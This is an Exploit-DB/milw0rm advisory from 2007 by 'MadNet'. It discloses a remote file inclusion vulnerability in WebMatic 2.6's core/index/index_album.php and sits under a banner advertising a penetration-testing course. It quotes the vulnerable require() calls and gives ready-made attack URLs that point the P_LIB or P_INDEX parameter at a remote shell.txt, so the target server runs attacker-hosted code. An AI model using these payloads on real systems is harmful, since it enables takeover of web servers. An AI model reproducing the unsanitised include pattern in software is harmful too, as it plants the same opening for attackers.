WebMatic 2.6 - 'index_album.php' Remote File Inclusion

EDB-ID:

3281


Author:

MadNet

Type:

webapps


Platform:

PHP

Date:

2007-02-07


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]